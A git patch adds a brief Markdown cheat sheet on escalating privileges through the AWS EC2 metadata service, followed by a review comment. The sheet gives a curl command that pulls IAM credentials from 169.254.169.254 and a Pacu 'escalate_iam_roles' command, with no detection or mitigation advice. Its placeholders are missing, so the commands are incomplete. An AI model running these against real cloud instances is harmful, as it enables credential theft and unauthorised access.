From a12fa64bb507b2625f9215d402cd08fe5500ca1c Mon Sep 17 00:00:00 2001 From: Mehdi Date: Mon, 1 Jan 2024 14:35:15 +0330 Subject: [PATCH] Create Privilege escalation EC2.md --- Privilege escalation EC2.md | 72 +++++++++++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Privilege escalation EC2.md diff --git a/Privilege escalation EC2.md b/Privilege escalation EC2.md new file mode 100644 index 0000000..35c32fa --- /dev/null +++ b/Privilege escalation EC2.md @@ -0,0 +1,72 @@ +# Privilege escalation through EC2 metadata + +### Method 1 +```bash +curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ +``` +* `curl`: The command-line tool used to perform the HTTP request. +* `http://169.254.169.254/latest/meta-data/iam/security-credentials/`: The URL endpoint of the metadata service to retrieve the security credentials for the specified IAM role. Replace with the name of the IAM role. + + +### Method 2 +```bash +python3 pacu.py --method escalate_iam_roles --profile --regions --instances +``` +* In this command, the [pacu.py script](https://github.com/RhinoSecurityLabs/pacu) is being executed with the `escalate_iam_roles` method, which is specifically designed to escalate privileges associated with IAM roles. +* `--profile` option specifies the AWS profile to use for authentication. +* `--regions` option specifies the AWS regions to target. +* `--instances` option is used to specify the target EC2 instance ID(s) on which the IAM roles will be escalated. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
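Review bot: In Method 1 the second bullet ends with "Replace with the name of the IAM role", but neither the `curl` command nor the URL repeated in the bullet contains a placeholder to replace, so the instruction has no referent. A placeholder such as `<role-name>` appears to have been dropped (angle brackets outside backticks are often swallowed as HTML by Markdown renderers); restore it inside backticks and state what the bare `security-credentials/` path shown in the command returns, since the bullet currently describes it as retrieving credentials "for the specified IAM role" while no role is specified. Method 2 has the same problem: `--profile --regions --instances` are written with no values or placeholders, so the command cannot be run as shown and the three bullets describe arguments the reader never sees. The file also ends with a long run of empty added lines that make up most of the 72 insertions and should be trimmed. Finally, the document stops after the two commands with no section on detecting or mitigating this access to the metadata service, which a reader of a page titled "Privilege escalation through EC2 metadata" would expect.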